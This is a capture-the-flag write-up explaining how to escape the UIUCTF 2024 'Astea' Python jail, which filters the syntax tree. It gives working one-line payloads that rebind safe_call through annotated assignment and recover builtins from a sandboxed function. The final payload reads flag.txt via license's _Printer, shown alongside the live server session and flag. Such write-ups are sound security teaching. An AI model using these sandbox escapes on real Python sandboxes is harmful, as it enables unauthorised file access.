UIUCTF 2024 - Astea Writeup


Category | Author  | Score | Solves
Misc     | Cameron | 470   | 52
Description

I heard you can get sent to jail for refusing a cup of tea in England.

Introduction

Pyjails are a classic CTF formula. But this challenge doesn't just go for the classic "remove some characters that seem necessary", where the solution is some way of replacing them with much more code.

Instead, this pyjail is trying to solve the problem at a lower level - by censoring the generated AST. The full challenge code is as follows:

import ast

def safe_import():
  print("Why do you need imports to make tea?")

def safe_call():
  print("Why do you need function calls to make tea?")

class CoolDownTea(ast.NodeTransformer):
  def visit_Call(self, node: ast.Call) -> ast.AST:
    return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])

  def visit_Import(self, node: ast.AST) -> ast.AST:
    return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))

  def visit_ImportFrom(self, node: ast.ImportFrom) -> ast.AST:
    return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))

  def visit_Assign(self, node: ast.Assign) -> ast.AST:
    return ast.Assign(targets=node.targets, value=ast.Constant(value=0))

  def visit_BinOp(self, node: ast.BinOp) -> ast.AST:
    return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))

code = input('Nothing is quite like a cup of tea in the morning: ').splitlines()[0]

cup = ast.parse(code)
cup = CoolDownTea().visit(cup)
ast.fix_missing_locations(cup)
exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

What we need to do

While it's not explicitly called out, we don't see a flag placeholder in the code, so it's reasonable to assume that we're looking to read some file, probably flag.txt. Seems simple enough.

What we can't do

Basically any exploration of this kind of a challenge will begin with a simple question: what's actually banned here?

Let's start with the more standard parts before moving to our AST transformer. First, the result of the input call is truncated to just its first line:

code = input('Nothing is quite like a cup of tea in the morning: ').splitlines()[0]

And then, after going through our AST transformer, we run our code through exec without __builtins__ (but with our two "safe" functions added into locals):

exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

Pretty basic stuff so far, so let's move on to the interesting bit the challenge gets its name from - our AST NodeTransformer. We can see that it modifies five node types (the two import nodes are grouped together below), so let's go through them in order of subjective importance:

  1. Call
     def visit_Call(self, node: ast.Call) -> ast.AST:
         return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])
    
    The lack of function calls immediately jumps out as one of the main issues with this challenge. But it's important to note that it's not quite a no-op - any call is just redirected to call safe_call, so maybe we can modify it somewhat?
  2. Assign
     def visit_Assign(self, node: ast.Assign) -> ast.AST:
         return ast.Assign(targets=node.targets, value=ast.Constant(value=0))
    
    Putting a wrench in that idea is our second filter - we can't just assign things as we like. Any attempt will result in just 0 being assigned to our variable.
  3. BinOps
     def visit_BinOp(self, node: ast.BinOp) -> ast.AST:
         return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))
    
    And if the lack of assignments wasn't enough, we can't even fall back on the basic pyjail trick of adding short strings together: every binary operation (BinOp) keeps its operator but has both operands replaced with 0. This means the classic string concatenation that often shows up in pyjail payloads isn't possible here.
  4. Imports

     def visit_Import(self, node: ast.AST) -> ast.AST:
         return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))
    
     def visit_ImportFrom(self, node: ast.ImportFrom) -> ast.AST:
         return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))
    

    And finally, we obviously also lose the ability to import anything. But since Python provides a lot of ways to read files without imports, it's probably the least consequential limitation.
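
To make the effect of these filters concrete, here is a minimal sketch that copies only the BinOp rule into a stand-alone transformer and evaluates a string concatenation through it. The class name ZeroBinOps and the "<demo>" filename are made up for this illustration; the rule itself is taken from the challenge code.

```python
import ast


class ZeroBinOps(ast.NodeTransformer):
    # Hypothetical stand-in that reproduces only the challenge's BinOp rule.
    def visit_BinOp(self, node: ast.BinOp) -> ast.AST:
        return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))


# 'fl' + 'ag' parses to a BinOp, so both operands get swapped for 0.
tree = ast.parse("'fl' + 'ag'", mode="eval")
tree = ZeroBinOps().visit(tree)
ast.fix_missing_locations(tree)

result = eval(compile(tree, "<demo>", "eval"))
print(result)  # the concatenation has become 0 + 0
```

The operator survives, but since both sides are constants by the time the code runs, nothing we write inside a binary operation ever reaches the interpreter.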

Solution

Where to start

We're dealing with Python's AST, so if you - like me - didn't memorize Python's abstract syntax grammar it's probably a good idea to start by learning a bit more about it and maybe even just looking at the definitions from the documentation. The most interesting part for us is obviously the inverse of our previous sections - is there anything interesting that isn't blocked? Well... To lead you through my train of thought here:

  • We can define functions and classes, only calling them is problematic. And the definitions have a decorator_list field:
      FunctionDef(identifier name, arguments args,
                         stmt* body, expr* decorator_list, expr? returns,
                         string? type_comment, type_param* type_params)
    
    So maybe decorators wouldn't be calls in the AST?
  • There aren't any limits on control flow, other than our one line requirement. Maybe something like match statements provides a way of calling functions without explicit calls in the AST? Or maybe there is some weird way of using exceptions that could help us?
  • We have formatted literals, and they do have at least some unusual ways of calling things (e.g. !r for calling repr), so maybe they won't result in a Call expression?
  • BoolOps aren't blocked, and even the comment in the grammar indicates they might use two values: -- BoolOp() can use left & right?
  • Typing appears in a separate section of the definition, so maybe we could just write some cursed python in types (like this)?
  • And finally, possibly the most important observation here, there are multiple types of Assigns - while our target code only blocks Assign we also have:
    AugAssign(expr target, operator op, expr value)
    
    And
    AnnAssign(expr target, expr annotation, expr? value, int simple)
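
A quick way to check the last observation is to ask the parser which node class each assignment form produces. This is only a small sketch; the helper name statement_node is an assumption of this example, not something from the challenge.

```python
import ast


def statement_node(code: str) -> str:
    # Name of the AST class used for the first statement in `code`.
    return type(ast.parse(code).body[0]).__name__


kinds = {code: statement_node(code) for code in ("a = 1", "a += 1", "a: int = 1")}

# The walrus operator is an expression, so look inside the Expr statement.
walrus = type(ast.parse("(a := 1)").body[0].value).__name__

print(kinds)
print(walrus)
```

Only the first form maps to Assign, which is the one class the transformer has a visitor for; the others are AugAssign, AnnAssign and (for the walrus) NamedExpr.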
    

Preparing for exploration

For this kind of Python task, an interactive environment provides a quick and easy way to experiment with different solutions. To make things a bit easier, we can define a simple function that gives us a textual representation of our (filtered) AST by using the ast.dump function together with some fragments of code from the task:

def parse(code):
    cup = ast.parse(code)
    cup = CoolDownTea().visit(cup)
    ast.fix_missing_locations(cup)
    return ast.dump(cup)

So we can see that, for example, parse("open('flag.txt')") returns

Module(body=[Expr(value=Call(func=Name(id='safe_call', ctx=Load()), args=[], keywords=[]))], type_ignores=[])

So our simple call to open was replaced by safe_call.

Let's also define a function to test our code by actually executing it:

def jail_exec(code):
    cup = ast.parse(code)
    cup = CoolDownTea().visit(cup)
    ast.fix_missing_locations(cup)
    exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

And as one can guess, jail_exec("open('flag.txt')") just ends up printing Why do you need function calls to make tea?

Actually solving the challenge

Attempt 1 - decorators

Decorators are wrapper functions, passed the function below them as an argument. So let's test if they're considered function calls:

parse("""
@print
def test(): pass
""")

This is essentially equivalent to test = print(test), but after parsing it we get

Module(body=[FunctionDef(name='test', args=arguments(posonlyargs=[], args=[], kwonlyargs=[], kw_defaults=[], defaults=[]), body=[Pass()], decorator_list=[Name(id='print', ctx=Load())], type_params=[])], type_ignores=[])

No safe_call! It seems we've found a solution! Now we just need to actually open and print the file with the restriction on arguments...
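
As a sanity check that a decorator really is invoked without any Call node, here is a small sketch. The decorator name record and the "<demo>" filename are assumptions of this example.

```python
import ast

source = "@record\ndef test(): pass\n"
tree = ast.parse(source)

# Walk the whole tree: a decorated definition contains no Call node at all.
has_call = any(isinstance(node, ast.Call) for node in ast.walk(tree))

seen = []


def record(func):
    # Hypothetical decorator that just notes which function it received.
    seen.append(func.__name__)
    return func


# Executing the definition is enough to run the decorator.
exec(compile(tree, "<demo>", "exec"), {"record": record})

print(has_call, seen)
```

The decorator runs at definition time with the function as its single argument, which is exactly the kind of implicit call the transformer never sees.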

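Thankfully our filtering doesn't see the contents of a string, so what if we just use exec ourselves? Well, we need a string to give it as an argument, but a simple @"some string".format will give us just that: called with the function as its only argument, str.format returns the string unchanged as long as it contains no replacement fields. So something like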

@exec
@"print(open('flag.txt').read())".format
def test(): pass

Seems like it should just work. And parsing it confirms the lack of filtered calls:

parse("""
@exec
@"print(open('flag.txt').read())".format
def test(): pass
""")

Module(body=[FunctionDef(name='test', args=arguments(posonlyargs=[], args=[], kwonlyargs=[], kw_defaults=[], defaults=[]), body=[Pass()], decorator_list=[Name(id='exec', ctx=Load()), Attribute(value=Constant(value="print(open('flag.txt').read())"), attr='format', ctx=Load())], type_params=[])], type_ignores=[])

But running it in our jail results in NameError: name 'exec' is not defined. And well, if you remember, we don't have builtins! So a bare exec won't work. Fortunately, the reason sanitizing Python is so hard is that we can usually just get it from somewhere else. And that somewhere can even be one of our "safe" functions, e.g. safe_import.__builtins__["exec"].

We'll also need to do the same with our print and open, but that's just as simple:

@safe_import.__builtins__["exec"]
@'safe_import.__builtins__["print"](safe_import.__builtins__["open"]("flag.txt").read())'.format
def test(): pass

Which results in the following AST:

Module(body=[FunctionDef(name='test', args=arguments(posonlyargs=[], args=[], kwonlyargs=[], kw_defaults=[], defaults=[]), body=[Pass()], decorator_list=[Subscript(value=Attribute(value=Name(id='safe_import', ctx=Load()), attr='__builtins__', ctx=Load()), slice=Constant(value='exec'), ctx=Load()), Attribute(value=Constant(value='safe_import.__builtins__["print"](safe_import.__builtins__["open"]("flag.txt").read())'), attr='format', ctx=Load())], type_params=[])], type_ignores=[])

And seems to execute with our jail_exec just fine.
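
To see why the stacked decorators above behave this way, they can be unrolled by hand. Decorators apply bottom-up, so the string's format method receives the function first and exec receives whatever format returns. This is a sketch with a harmless payload; the payload and the result list are assumptions of this example.

```python
def test():
    pass


payload = "result.append(6 * 7)"

# Step 1: the inner decorator. With no {} fields in the string,
# format() ignores its argument and returns the text unchanged.
as_string = payload.format(test)

# Step 2: the outer decorator. exec() receives that plain string.
result = []
exec(as_string, {"result": result})

print(as_string == payload, result)
```

One caveat of this trick is that literal braces in the payload would be treated as replacement fields by format, so they would have to be doubled or avoided.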

But when trying to execute with the full CTF code, we just get SyntaxError: invalid syntax! What gives?

Well, going back to our requirements - we have multiple lines! So how do we compress decorators to just one line? How does the syntax for defining functions even look in Python exactly?

Well, unfortunately finding it requires a slight bit of digging (which I'm not alone in complaining about - as seen in this tweet looking for the same docs), but when we finally find it we can see the important part at the start:

funcdef                   ::=  [decorators] "def" funcname [type_params] "(" [parameter_list] ")"
                               ["->" expression] ":" suite
decorators                ::=  decorator+
decorator                 ::=  "@" assignment_expression NEWLINE

So... It seems decorators need a newline... Well, that breaks our idea. So what else can we do?
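
The grammar can be confirmed directly with the parser. This small sketch (the helper name parses is made up) tries the multi-line form and two attempts at squeezing it onto one line.

```python
import ast


def parses(code: str) -> bool:
    # True if Python's parser accepts `code`, False on a SyntaxError.
    try:
        ast.parse(code)
    except SyntaxError:
        return False
    return True


multi_line = parses("@print\ndef test(): pass")
one_line = parses("@print def test(): pass")
with_semicolon = parses("@print; def test(): pass")

print(multi_line, one_line, with_semicolon)
```

Only the version with a real newline after the decorator is accepted, and a semicolon is not a substitute for it.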

Attempt 2 - string formatting

This will be a quick one, since we can see that the AST for something like f'{print()}' is

Module(body=[Expr(value=JoinedStr(values=[FormattedValue(value=Call(func=Name(id='safe_call', ctx=Load()), args=[], keywords=[]), conversion=-1)]))], type_ignores=[])

Which includes a Call. Our 'bypasses' in the form of !r, !s and !a, like in f'{()!r}', don't:

Module(body=[Expr(value=JoinedStr(values=[FormattedValue(value=Tuple(elts=[], ctx=Load()), conversion=114)]))], type_ignores=[])

But according to the documentation (even the AST docs list them), these three are all the conversions there are. So without being able to change the __repr__ or __str__ of some object we won't get anywhere, and if we could do that we wouldn't even need f-strings...
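
For completeness, here is a sketch of what the !r conversion does and does not give us. The class name Loud is an assumption of this example.

```python
import ast

tree = ast.parse("f'{x!r}'")

# No Call node anywhere in the tree, only a FormattedValue with a conversion code.
has_call = any(isinstance(node, ast.Call) for node in ast.walk(tree))
conversion = tree.body[0].value.values[0].conversion


class Loud:
    # Hypothetical object whose __repr__ we control.
    def __repr__(self):
        return "repr was called"


# At runtime the conversion still ends up invoking __repr__.
text = eval("f'{x!r}'", {"x": Loud()})

print(has_call, conversion, text)
```

So the conversion is a hidden call, but only to repr, str or ascii on an object we would first need to be able to customize.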

Attempt 3 - different assigns

So let's go back to what we noticed in the AST grammar - the assign limitation, which we can assume was placed there for a reason, can be bypassed.

So what are AugAssign and AnnAssign? Just a bit below the AST grammar definition we can find descriptions of node classes, so we can see that:

  • AugAssign is for augmented assignment - operations like +=, -=, *=, etc. (the walrus operator := is a separate NamedExpr node, which isn't filtered either)
  • AnnAssign is an assignment with a type annotation, so things like a: int = 1

Of these, AnnAssign is basically just Assign. It's not like the annotations are something strictly checked. Just doing something trivial like a: 0 = "test" will confirm that we really don't need to care about this for our purposes.

So, what can we do with assigns?

Let's look at our Call filter again:

def visit_Call(self, node: ast.Call) -> ast.AST:
    return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])

All calls are redirected to a function named safe_call, which is supposed to be harmless. But now that we have assigns, what would happen if we reassigned what's under that identifier? Let's quickly test that:

jail_exec("""safe_call: 0 = 1; safe_call()""")

And we get a TypeError: 'int' object is not callable - success! We changed the object we called!

Now, because of the replacement code, we don't have arguments. So we can't just make safe_call an exec or something that simple. We need to change it to a function that will somehow print a file we need without requiring any arguments...
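
The whole situation can be reproduced in a few lines. The sketch below uses a cut-down transformer containing only the Call and Assign rules from the challenge; the names MiniJail, run and replacement are assumptions of this example.

```python
import ast


class MiniJail(ast.NodeTransformer):
    # Hypothetical cut-down copy of the challenge's Call and Assign rules.
    def visit_Call(self, node: ast.Call) -> ast.AST:
        return ast.Call(func=ast.Name(id="safe_call", ctx=ast.Load()), args=[], keywords=[])

    def visit_Assign(self, node: ast.Assign) -> ast.AST:
        return ast.Assign(targets=node.targets, value=ast.Constant(value=0))


calls = []


def safe_call():
    calls.append("original")


def replacement(*args):
    calls.append(("replacement", args))


def run(code: str) -> dict:
    tree = MiniJail().visit(ast.parse(code))
    ast.fix_missing_locations(tree)
    scope = {"safe_call": safe_call, "replacement": replacement}
    exec(compile(tree, "<demo>", "exec"), {"__builtins__": {}}, scope)
    return scope


# A plain assignment is neutralised: safe_call just becomes 0.
plain = run("safe_call = replacement")

# An annotated assignment goes through, and every call now lands on
# the replacement, but with its arguments stripped.
run("safe_call: 0 = replacement; anything(1, 2)")

print(plain["safe_call"], calls)
```

The recorded call has an empty argument tuple, which is why the replacement has to be something that does useful work when called with no arguments.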

_Printer objects

Have you ever wondered how license() or copyright() work? Well, they're actually a great tool for escaping pyjails, because they're both just _Printer objects. And looking into the code behind them quickly reveals why that's so useful:

def __setup(self):
    if self.__lines:
        return
    data = None
    for filename in self.__filenames:
        try:
            with open(filename, encoding='utf-8') as fp:
                data = fp.read()
            break
        except OSError:
            pass
    if not data:
        data = self.__data
    self.__lines = data.split('\n')
    self.__linecnt = len(self.__lines)
[...]
def __call__(self):
    self.__setup()
    [...]

We're reading files! And these files don't come from arguments, but rather from the __filenames attribute (name-mangled to _Printer__filenames when accessed from outside the class). So, if we can just set this to our target file and call license(), we're going to get the contents of the file back.
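
Here is a sketch of that idea in isolation. It assumes CPython, where the class lives in the private _sitebuiltins module, and it builds a throwaway printer pointed at a temporary file rather than touching the real license object. The file contents and the "demo" name are made up.

```python
import contextlib
import io
import os
import tempfile

from _sitebuiltins import _Printer  # private CPython module behind license()

# A throwaway printer, so the real license object stays untouched.
printer = _Printer("demo", "fallback text used when no file can be read")

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "flag.txt")
    with open(path, "w", encoding="utf-8") as handle:
        handle.write("demo{not_a_real_flag}")

    # Name mangling stores self.__filenames as _Printer__filenames.
    printer._Printer__filenames = [path]

    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        printer()  # no arguments needed: the file is read and printed

output = buffer.getvalue()
print(output)
```

Because the target file is short, the pager loop inside __call__ prints everything and returns without prompting for input.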

And it really is almost that simple - just doing this:

license._Printer__filenames: 0 = ["flag.txt"];safe_call: 0 = license;license()

We're getting the following AST:

Module(body=[AnnAssign(target=Attribute(value=Name(id='license', ctx=Load()), attr='_Printer__filenames', ctx=Store()), annotation=Constant(value=0), value=List(elts=[Constant(value='flag.txt')], ctx=Load()), simple=0), AnnAssign(target=Name(id='safe_call', ctx=Store()), annotation=Constant(value=0), value=Name(id='license', ctx=Load()), simple=1), Expr(value=Call(func=Name(id='safe_call', ctx=Load()), args=[], keywords=[]))], type_ignores=[])

But unfortunately running it throws the familiar NameError: name 'license' is not defined.

We've seen that before though. So let's just use safe_import.__builtins__ again, for the final code that looks like this:

safe_import.__builtins__["license"]._Printer__filenames: 0 = ["flag.txt"];safe_call: 0 = safe_import.__builtins__["license"];license()

Results

Running our final code snippet after connecting to the challenge server (ncat --ssl astea.chal.uiuc.tf 1337) confirms that we have indeed solved the challenge and rewards us with the flag:

$ ncat --ssl astea.chal.uiuc.tf 1337
Nothing is quite like a cup of tea in the morning: safe_import.__builtins__["license"]._Printer__filenames: 0 = ["flag.txt"];safe_call: 0 = safe_import.__builtins__["license"];license()
uiuctf{maybe_we_shouldnt_sandbox_python_2691d6c1}

Afterword

As with basically all pyjail solutions, this is just one of many ways of solving it. I like _Printer, so that's what I went with. Even without AnnAssign there are other ways to assign: we also have AugAssign, and the walrus operator (a NamedExpr node, which isn't filtered either) can be very useful. I actually started tinkering with it before quickly realizing I could just override safe_call with AnnAssign.

Additionally, we can also access the __globals__ of our safe_call/safe_import functions, which adds some more options.
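
As a rough sketch of what that attribute exposes: a function's __globals__ is the namespace of the module that defined it, which in turn holds a reference to the builtins. The variable names below are assumptions of this example.

```python
def safe_call():
    print("Why do you need function calls to make tea?")


# The globals of the defining module, reachable from the function object.
module_globals = safe_call.__globals__
same_dict = module_globals is globals()

# __builtins__ is the builtins module in __main__ and a plain dict in other
# modules, so normalise it to a dict before looking anything up.
builtins_ref = module_globals["__builtins__"]
lookup = getattr(builtins_ref, "__dict__", builtins_ref)
found_open = lookup["open"]

print(same_dict, found_open)
```

In the challenge this namespace would also contain everything else defined at the top level of the server script, such as the imported ast module.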

After the CTF it also turned out that there was a more direct issue with the node visitors - SDark noted on UIUCTF's Discord that they solved this challenge by abusing visit_Assign, which turns out to allow bypassing the other filters by putting whatever you like on the left side of an assignment: visit_Assign copies node.targets into the new node without visiting them, so nothing inside the targets is ever filtered.
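
The sketch below illustrates the general idea only; it is not SDark's actual payload, which isn't reproduced here. It reuses the Call and Assign rules from the challenge in a cut-down transformer, and the names MiniJail, leak and store are assumptions of this example.

```python
import ast


class MiniJail(ast.NodeTransformer):
    # Hypothetical cut-down copy of the challenge's Call and Assign rules.
    def visit_Call(self, node: ast.Call) -> ast.AST:
        return ast.Call(func=ast.Name(id="safe_call", ctx=ast.Load()), args=[], keywords=[])

    def visit_Assign(self, node: ast.Assign) -> ast.AST:
        # The targets are reused as-is and never visited.
        return ast.Assign(targets=node.targets, value=ast.Constant(value=0))


seen = []


def leak(value):
    seen.append(value)
    return "key"


store = {}

# The call sits inside the assignment target, not in the value.
tree = MiniJail().visit(ast.parse("store[leak('secret')] = 1"))
ast.fix_missing_locations(tree)
scope = {"store": store, "leak": leak, "safe_call": lambda: None}
exec(compile(tree, "<demo>", "exec"), {"__builtins__": {}}, scope)

print(seen, store)
```

The assigned value is forced to 0 as expected, but the call in the subscript runs with its original function and arguments intact.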

In summary, sandboxing Python is hell.

It also turned out this challenge wasn't as unique as I thought - GCTF 2022 had a similar challenge (Treebox) that also filtered the AST, but didn't require a single-line solution, which led to the decorator use that I started with (though I only found out about that task and its writeups after coming up with a working solution... I think I might've even seen some writeup [maybe this?] and remembered the method but forgot where it came from :D).